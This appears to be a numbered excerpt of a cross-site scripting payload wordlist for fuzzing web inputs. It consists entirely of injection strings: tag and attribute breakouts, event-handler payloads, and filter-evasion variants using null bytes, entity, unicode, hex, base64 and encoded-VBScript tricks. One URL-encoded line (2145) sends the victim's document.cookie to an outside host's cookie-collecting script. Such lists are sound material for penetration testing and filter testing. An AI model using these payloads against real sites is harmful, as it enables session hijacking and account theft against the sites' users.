  2095. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2096. "><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2097. '><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2098. <IMG SRC="jav&#x0A;ascript:alert('X');">
  2099. "><IMG SRC="jav&#x0A;ascript:alert('X');">
  2100. '><IMG SRC="jav&#x0A;ascript:alert('X');">
  2101. exp/*<A STYLE='no\X:noX("*//*");X:ex/*X*//*/*/pression(alert("X"))'>
  2102. '"--></style></script><script>alert("X")</script>
  2103. '"--></style></script><script>prompt(1)</script>
  2104. "><script>prompt(1)</script>
  2105. '><script>prompt(1)</script>
  2106. "></script><script>prompt(1)</script>
  2107. "><script>prompt(1)</script>
  2108. '><script>prompt(1)</script>
  2109. '></script><script>prompt(1)</script>
  2110. "><script>prompt(1)</script>
  2111. '><script>prompt(1)</script>
  2112. &'"><script>alert(/X/)</script>
  2113. "><script>alert(/X/)</script>
  2114. '><script>alert(/X/)</script>
  2115. %26'%22%3E%3Cscript%3Ealert(%2FX%2F)%3C%2Fscript%3E%3D
  2116. &'">PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4
  2117. &'">/'-C<FEP=#YA;&5R="@O>'-S+RD\+W-C<FEP=#.
  2118. &'">\u{3c}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}\u{61}\u{6c}\u{65}\u{72}\u{74}\u{28}\u{2f}\u{78}\u{73}\u{73}\u{2f}\u{29}\u{3c}\u{2f}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}
  2119. &'">\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u002f\u0078\u0073\u0073\u002f\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
  2120. &'">0x3c7363726970743e616c657274282f7873732f293c2f7363726970743e
  2121. &'">-1,54,38,53,44,51,55,-1,36,47,40,53,55,-1,-1,59,54,54,-1,-1,-1,-1,54,38,53,44,51,55,-1
  2122. &'">PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
  2123. &'">3e7470697263732f3c292f7373782f287472656c613e7470697263733c
  2124. &'">chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62).chr(97).chr(108).chr(101).chr(114).chr(116).chr(40).chr(47).chr(120).chr(115).chr(115).chr(47).chr(41).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62)
  2125. &'">TypeError: Cannot read property '$content$' of undefined
  2126. &'">\74\163\143\162\151\160\164\76\141\154\145\162\164\50\57\170\163\163\57\51\74\57\163\143\162\151\160\164\76
  2127. &'"><script>alert(/X/)</āăą>
  2128. &'">%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u002f%u0078%u0073%u0073%u002f%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
  2129. &'">\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff0f\uff58\uff53\uff53\uff0f\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
  2130. &'">&lt;script&gt;alert&lpar;&sol;X&sol;&rpar;&lt;&sol;script&gt;
  2131. &'">&lt;script&gt;alert(/X/)&lt;/script&gt;
  2132. &'">Description:Syntax error Msg:Unexpected token < )
  2133. </script><svg onload='-/"/-alert(1)//'>
  2134. "></script><svg onload='-/"/-alert(1)//'>
  2135. '></script><svg onload='-/"/-alert(1)//'>
  2136. <!-- --!><script>alert(X)</script>-->
  2137. "><!-- --!><script>alert(X)</script>-->
  2138. '><!-- --!><script>alert(X)</script>-->
  2139. <![CDATA[<script>alert(X)</script>]]>
  2140. "><![CDATA[<script>alert(X)</script>]]>
  2141. '><![CDATA[<script>alert(X)</script>]]>
  2142. [data "1<div style=width:expression(prompt(1))>"]
  2143. +onerror=alert(1)%3E/
  2144. +onerror=prompt(1)%3E/
  2145. ?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
  2146. ?#?gad=xxxx"onload="alert(1)"
  2147. #?gad=xxxx"onload="alert(1)"
  2148. /#?gad=xxxx"onload="alert(1)"
  2149. “><script >alert(1)</script >
  2150. “><ScRiPt>alert(1)</ScRiPt>
  2151. “%3e%3cscript%3ealert(1)%3c/script%3e
  2152. “><scr<script>ipt>alert(1)</scr</script>ipt>
  2153. "><scr<script>ipt>alert(1)</scr</script>ipt>
  2154. '><scr<script>ipt>alert(1)</scr</script>ipt>
  2155. %00“><script>alert(1)</script>
  2156. "><script>alert(1)</script>
  2157. '><script>alert(1)</script>
  2158. <xml onreadystatechange=alert(1)>
  2159. "><xml onreadystatechange=alert(1)>
  2160. '><xml onreadystatechange=alert(1)>
  2161. <style onreadystatechange=alert(1)>
  2162. "><style onreadystatechange=alert(1)>
  2163. '><style onreadystatechange=alert(1)>
  2164. <iframe onreadystatechange=alert(1)>
  2165. "><iframe onreadystatechange=alert(1)>
  2166. '><iframe onreadystatechange=alert(1)>
  2167. <object onerror=alert(1)>
  2168. "><object onerror=alert(1)>
  2169. '><object onerror=alert(1)>
  2170. <object type=image src=X.gif onreadystatechange=alert(1)></object>
  2171. "><object type=image src=X.gif onreadystatechange=alert(1)></object>
  2172. '><object type=image src=X.gif onreadystatechange=alert(1)></object>
  2173. <img type=image src=X.gif onreadystatechange=alert(1)>
  2174. "><img type=image src=X.gif onreadystatechange=alert(1)>
  2175. '><img type=image src=X.gif onreadystatechange=alert(1)>
  2176. <input type=image src=X.gif onreadystatechange=alert(1)>
  2177. "><input type=image src=X.gif onreadystatechange=alert(1)>
  2178. '><input type=image src=X.gif onreadystatechange=alert(1)>
  2179. <isindex type=image src=X.gif onreadystatechange=alert(1)>
  2180. "><isindex type=image src=X.gif onreadystatechange=alert(1)>
  2181. '><isindex type=image src=X.gif onreadystatechange=alert(1)>
  2182. <script onreadystatechange=alert(1)>
  2183. "><script onreadystatechange=alert(1)>
  2184. '><script onreadystatechange=alert(1)>
  2185. <bgsound onpropertychange=alert(1)>
  2186. "><bgsound onpropertychange=alert(1)>
  2187. '><bgsound onpropertychange=alert(1)>
  2188. <body onbeforeactivate=alert(1)>
  2189. "><body onbeforeactivate=alert(1)>
  2190. '><body onbeforeactivate=alert(1)>
  2191. <body onactivate=alert(1)>
  2192. "><body onactivate=alert(1)>
  2193. '><body onactivate=alert(1)>
  2194. <body onfocusin=alert(1)>
  2195. "><body onfocusin=alert(1)>
  2196. '><body onfocusin=alert(1)>
  2197. <input onblur=alert(1) autofocus><input autofocus>
  2198. "><input onblur=alert(1) autofocus><input autofocus>
  2199. '><input onblur=alert(1) autofocus><input autofocus>
  2200. <body onscroll=alert(1)><br><br>...<br><input autofocus>
  2201. "><body onscroll=alert(1)><br><br>...<br><input autofocus>
  2202. '><body onscroll=alert(1)><br><br>...<br><input autofocus>
  2203. </a onmousemove=alert(1)>
  2204. "></a onmousemove=alert(1)>
  2205. '></a onmousemove=alert(1)>
  2206. <video src=1 onerror=alert(1)>
  2207. "><video src=1 onerror=alert(1)>
  2208. '><video src=1 onerror=alert(1)>
  2209. <audio src=1 onerror=alert(1)>
  2210. "><audio src=1 onerror=alert(1)>
  2211. '><audio src=1 onerror=alert(1)>
  2212. <object data=javascript:alert(1)>
  2213. "><object data=javascript:alert(1)>
  2214. '><object data=javascript:alert(1)>
  2215. <iframe src=javascript:alert(1)>
  2216. "><iframe src=javascript:alert(1)>
  2217. '><iframe src=javascript:alert(1)>
  2218. <embed src=javascript:alert(1)>
  2219. "><embed src=javascript:alert(1)>
  2220. '><embed src=javascript:alert(1)>
  2221. <form id=test /><button form=test formaction=javascript:alert(1)>
  2222. "><form id=test /><button form=test formaction=javascript:alert(1)>
  2223. '><form id=test /><button form=test formaction=javascript:alert(1)>
  2224. <event-source src=javascript:alert(1)>
  2225. "><event-source src=javascript:alert(1)>
  2226. '><event-source src=javascript:alert(1)>
  2227. <x style=x:expression(alert(1))>
  2228. "><x style=x:expression(alert(1))>
  2229. '><x style=x:expression(alert(1))>
  2230. <x style=behavior:url(#default#time2) onbegin=alert(1)>
  2231. "><x style=behavior:url(#default#time2) onbegin=alert(1)>
  2232. '><x style=behavior:url(#default#time2) onbegin=alert(1)>
  2233. <iMg onerror=alert(1) src=a>
  2234. "><iMg onerror=alert(1) src=a>
  2235. '><iMg onerror=alert(1) src=a>
  2236. <[%00]img onerror=alert(1) src=a>
  2237. "><[%00]img onerror=alert(1) src=a>
  2238. '><[%00]img onerror=alert(1) src=a>
  2239. <i[%00]mg onerror=alert(1) src=a>
  2240. "><i[%00]mg onerror=alert(1) src=a>
  2241. '><i[%00]mg onerror=alert(1) src=a>
  2242. <img/onerror=alert(1) src=a>
  2243. "><img/onerror=alert(1) src=a>
  2244. '><img/onerror=alert(1) src=a>
  2245. <img[%09]onerror=alert(1) src=a>
  2246. "><img[%09]onerror=alert(1) src=a>
  2247. '><img[%09]onerror=alert(1) src=a>
  2248. <img[%0d]onerror=alert(1) src=a>
  2249. "><img[%0d]onerror=alert(1) src=a>
  2250. '><img[%0d]onerror=alert(1) src=a>
  2251. <img[%0a]onerror=alert(1) src=a>
  2252. "><img[%0a]onerror=alert(1) src=a>
  2253. '><img[%0a]onerror=alert(1) src=a>
  2254. <img/”onerror=alert(1) src=a>
  2255. "><img/”onerror=alert(1) src=a>
  2256. '><img/”onerror=alert(1) src=a>
  2257. <img/’onerror=alert(1) src=a>
  2258. "><img/’onerror=alert(1) src=a>
  2259. '><img/’onerror=alert(1) src=a>
  2260. <img/anyjunk/onerror=alert(1) src=a>
  2261. "><img/anyjunk/onerror=alert(1) src=a>
  2262. '><img/anyjunk/onerror=alert(1) src=a>
  2263. <img o[%00]nerror=alert(1) src=a>
  2264. "><img o[%00]nerror=alert(1) src=a>
  2265. '><img o[%00]nerror=alert(1) src=a>
  2266. <i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>
  2267. "><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>
  2268. '><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>
  2269. <img onerror=”alert(1)”src=a>
  2270. "><img onerror=”alert(1)”src=a>
  2271. '><img onerror=”alert(1)”src=a>
  2272. <img onerror=’alert(1)’src=a>
  2273. "><img onerror=’alert(1)’src=a>
  2274. '><img onerror=’alert(1)’src=a>
  2275. <img onerror=`alert(1)`src=a>
  2276. "><img onerror=`alert(1)`src=a>
  2277. '><img onerror=`alert(1)`src=a>
  2278. <iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >
  2279. "><iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >
  2280. '><iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >
  2281. <img onerror=a&#x06c;ert(1) src=a>
  2282. "><img onerror=a&#x06c;ert(1) src=a>
  2283. '><img onerror=a&#x06c;ert(1) src=a>
  2284. <img onerror=a&#x006c;ert(1) src=a>
  2285. "><img onerror=a&#x006c;ert(1) src=a>
  2286. '><img onerror=a&#x006c;ert(1) src=a>
  2287. <img onerror=a&#x0006c;ert(1) src=a>
  2288. "><img onerror=a&#x0006c;ert(1) src=a>
  2289. '><img onerror=a&#x0006c;ert(1) src=a>
  2290. <img onerror=a&#108;ert(1) src=a>
  2291. "><img onerror=a&#108;ert(1) src=a>
  2292. '><img onerror=a&#108;ert(1) src=a>
  2293. <img onerror=a&#0108;ert(1) src=a>
  2294. "><img onerror=a&#0108;ert(1) src=a>
  2295. '><img onerror=a&#0108;ert(1) src=a>
  2296. <img onerror=a&#108ert(1) src=a>
  2297. "><img onerror=a&#108ert(1) src=a>
  2298. '><img onerror=a&#108ert(1) src=a>
  2299. <img onerror=a&#0108ert(1) src=a>
  2300. "><img onerror=a&#0108ert(1) src=a>
  2301. '><img onerror=a&#0108ert(1) src=a>
  2302. %253cimg%20onerror=alert(1)%20src=a%253e
  2303. %3cimg onerror=alert(1) src=a%3e
  2304. <img onerror=alert(1) src=a>
  2305. "><img onerror=alert(1) src=a>
  2306. '><img onerror=alert(1) src=a>
  2307. «img onerror=alert(1) src=a»
  2308. <script>a\u006cert(1);</script>
  2309. "><script>a\u006cert(1);</script>
  2310. '><script>a\u006cert(1);</script>
  2311. <script>eval(‘a\u006cert(1)’);</script>
  2312. "><script>eval(‘a\u006cert(1)’);</script>
  2313. '><script>eval(‘a\u006cert(1)’);</script>
  2314. <script>eval(‘a\x6cert(1)’);</script>
  2315. "><script>eval(‘a\x6cert(1)’);</script>
  2316. '><script>eval(‘a\x6cert(1)’);</script>
  2317. <script>eval(‘a\154ert(1)’);</script>
  2318. "><script>eval(‘a\154ert(1)’);</script>
  2319. '><script>eval(‘a\154ert(1)’);</script>
  2320. <script>eval(‘a\l\ert\(1\)’);</script>
  2321. "><script>eval(‘a\l\ert\(1\)’);</script>
  2322. '><script>eval(‘a\l\ert\(1\)’);</script>
  2323. <script>eval(‘al’+’ert(1)’);</script>
  2324. "><script>eval(‘al’+’ert(1)’);</script>
  2325. '><script>eval(‘al’+’ert(1)’);</script>
  2326. <script>eval(String.fromCharCode(75,67,70));</script>
  2327. "><script>eval(String.fromCharCode(75,67,70));</script>
  2328. '><script>eval(String.fromCharCode(75,67,70));</script>
  2329. <script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
  2330. "><script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
  2331. '><script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
  2332. <script>’alert(1)’.replace(/.+/,eval)</script>
  2333. "><script>’alert(1)’.replace(/.+/,eval)</script>
  2334. '><script>’alert(1)’.replace(/.+/,eval)</script>
  2335. <script>function::[‘alert’](1)</script>
  2336. "><script>function::[‘alert’](1)</script>
  2337. '><script>function::[‘alert’](1)</script>
  2338. <img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>
  2339. "><img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>
  2340. '><img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>
  2341. <script language=vbs>MsgBox 1</script>
  2342. "><script language=vbs>MsgBox 1</script>
  2343. '><script language=vbs>MsgBox 1</script>
  2344. <img onerror=”vbs:MsgBox 1” src=a>
  2345. "><img onerror=”vbs:MsgBox 1” src=a>
  2346. '><img onerror=”vbs:MsgBox 1” src=a>
  2347. <img onerror=MsgBox+1 language=vbs src=a>
  2348. "><img onerror=MsgBox+1 language=vbs src=a>
  2349. '><img onerror=MsgBox+1 language=vbs src=a>
  2350. <SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>
  2351. "><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>
  2352. '><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>
  2353. <IMG ONERROR=”VBS:MSGBOX 1” SRC=A>
  2354. "><IMG ONERROR=”VBS:MSGBOX 1” SRC=A>
  2355. '><IMG ONERROR=”VBS:MSGBOX 1” SRC=A>
  2356. <script>execScript(“MsgBox 1”,”vbscript”);</script>
  2357. "><script>execScript(“MsgBox 1”,”vbscript”);</script>
  2358. '><script>execScript(“MsgBox 1”,”vbscript”);</script>
  2359. <script language=vbs>execScript(“alert(1)”)</script>
  2360. "><script language=vbs>execScript(“alert(1)”)</script>
  2361. '><script language=vbs>execScript(“alert(1)”)</script>
  2362. <SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(“ALERT(1)”)) </SCRIPT>
  2363. "><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(“ALERT(1)”)) </SCRIPT>
  2364. '><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(“ALERT(1)”)) </SCRIPT>
  2365. <IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(1)’)” SRC=A>
  2366. "><IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(1)’)” SRC=A>
  2367. '><IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(1)’)” SRC=A>
  2368. <img onerror=”VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@” src=a>
  2369. "><img onerror=”VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@” src=a>
  2370. '><img onerror=”VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@” src=a>
  2371. <img language=”JScript.Encode” onerror=”#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@” src=a>
  2372. "><img language=”JScript.Encode” onerror=”#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@” src=a>
  2373. '><img language=”JScript.Encode” onerror=”#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@” src=a>
  2374. <script>var a = ‘</script><script>alert(1)</script>
  2375. "><script>var a = ‘</script><script>alert(1)</script>
  2376. '><script>var a = ‘</script><script>alert(1)</script>
  2377. "><script>alert(1)</script>
  2378. '><script>alert(1)</script>
  2379. <scr%00ipt%20&message=> alert(‘X’)</script>
  2380. "><scr%00ipt%20&message=> alert(‘X’)</script>
  2381. '><scr%00ipt%20&message=> alert(‘X’)</script>
  2382. “<script>prompt(1)</script>
  2383. "><script>prompt(1)</script>
  2384. '><script>prompt(1)</script>
  2385. “;alert(1)//
  2386. ‘-alert(1)-’
  2387. “<script>alert(1)</script>
  2388. "><script>alert(1)</script>
  2389. '><script>alert(1)</script>
  2390. “;prompt(1)//
  2391. ‘-prompt(1)-’
  2392. <input type="text" AUTOFOCUS onfocus=alert(1)>
  2393. "><input type="text" AUTOFOCUS onfocus=alert(1)>
  2394. '><input type="text" AUTOFOCUS onfocus=alert(1)>
  2395. <script\x20type="text/javascript">javascript:alert(1);</script>
  2396. "><script\x20type="text/javascript">javascript:alert(1);</script>
  2397. '><script\x20type="text/javascript">javascript:alert(1);</script>
  2398. <script\x3Etype="text/javascript">javascript:alert(1);</script>
  2399. "><script\x3Etype="text/javascript">javascript:alert(1);</script>
  2400. '><script\x3Etype="text/javascript">javascript:alert(1);</script>
  2401. <script\x0Dtype="text/javascript">javascript:alert(1);</script>
  2402. "><script\x0Dtype="text/javascript">javascript:alert(1);</script>
  2403. '><script\x0Dtype="text/javascript">javascript:alert(1);</script>
  2404. <script\x09type="text/javascript">javascript:alert(1);</script>
  2405. "><script\x09type="text/javascript">javascript:alert(1);</script>
  2406. '><script\x09type="text/javascript">javascript:alert(1);</script>
  2407. <script\x0Ctype="text/javascript">javascript:alert(1);</script>
  2408. "><script\x0Ctype="text/javascript">javascript:alert(1);</script>
  2409. '><script\x0Ctype="text/javascript">javascript:alert(1);</script>
  2410. <script\x2Ftype="text/javascript">javascript:alert(1);</script>
  2411. "><script\x2Ftype="text/javascript">javascript:alert(1);</script>
  2412. '><script\x2Ftype="text/javascript">javascript:alert(1);</script>
  2413. <script\x0Atype="text/javascript">javascript:alert(1);</script>
  2414. "><script\x0Atype="text/javascript">javascript:alert(1);</script>
  2415. '><script\x0Atype="text/javascript">javascript:alert(1);</script>
  2416. '`"><\x3Cscript>javascript:alert(1)</script>
  2417. '`"><\x00script>javascript:alert(1)</script>
  2418. <img src=1 href=1 onerror="javascript:alert(1)"></img>
  2419. "><img src=1 href=1 onerror="javascript:alert(1)"></img>
  2420. '><img src=1 href=1 onerror="javascript:alert(1)"></img>
  2421. <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  2422. "><audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  2423. '><audio src=1 href=1 onerror="javascript:alert(1)"></audio>
  2424. <video src=1 href=1 onerror="javascript:alert(1)"></video>
  2425. "><video src=1 href=1 onerror="javascript:alert(1)"></video>
  2426. '><video src=1 href=1 onerror="javascript:alert(1)"></video>
  2427. <body src=1 href=1 onerror="javascript:alert(1)"></body>
  2428. "><body src=1 href=1 onerror="javascript:alert(1)"></body>
  2429. '><body src=1 href=1 onerror="javascript:alert(1)"></body>
  2430. <image src=1 href=1 onerror="javascript:alert(1)"></image>
  2431. "><image src=1 href=1 onerror="javascript:alert(1)"></image>
  2432. '><image src=1 href=1 onerror="javascript:alert(1)"></image>
  2433. <object src=1 href=1 onerror="javascript:alert(1)"></object>
  2434. "><object src=1 href=1 onerror="javascript:alert(1)"></object>
  2435. '><object src=1 href=1 onerror="javascript:alert(1)"></object>
  2436. <script src=1 href=1 onerror="javascript:alert(1)"></script>
  2437. "><script src=1 href=1 onerror="javascript:alert(1)"></script>
  2438. '><script src=1 href=1 onerror="javascript:alert(1)"></script>
  2439. <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  2440. "><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  2441. '><svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
  2442. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  2443. "><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  2444. '><title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
  2445. <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  2446. "><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  2447. '><iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
  2448. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  2449. "><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  2450. '><body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
  2451. <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  2452. "><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  2453. '><body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
  2454. <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  2455. "><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  2456. '><frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
  2457. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  2458. "><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  2459. '><script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
  2460. <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  2461. "><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  2462. '><html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
  2463. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  2464. "><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  2465. '><body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
  2466. <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  2467. "><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  2468. '><svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
  2469. <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  2470. "><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  2471. '><body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
  2472. <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  2473. "><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  2474. '><body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
  2475. <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  2476. "><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  2477. '><body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
  2478. <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  2479. "><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  2480. '><body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
  2481. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  2482. "><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  2483. '><bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
  2484. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  2485. "><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  2486. '><html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
  2487. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  2488. "><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  2489. '><html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
  2490. <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  2491. "><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  2492. '><style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
  2493. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  2494. "><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  2495. '><iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
  2496. <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  2497. "><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  2498. '><body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
  2499. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  2500. "><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  2501. '><style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
  2502. <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  2503. "><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  2504. '><frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
  2505. <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  2506. "><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  2507. '><applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
  2508. <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  2509. "><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  2510. '><marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
  2511. <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  2512. "><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  2513. '><script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
  2514. <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  2515. "><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  2516. '><html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
  2517. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  2518. "><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  2519. '><html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
  2520. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  2521. "><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  2522. '><body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
  2523. <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  2524. "><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
  2525. '><html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
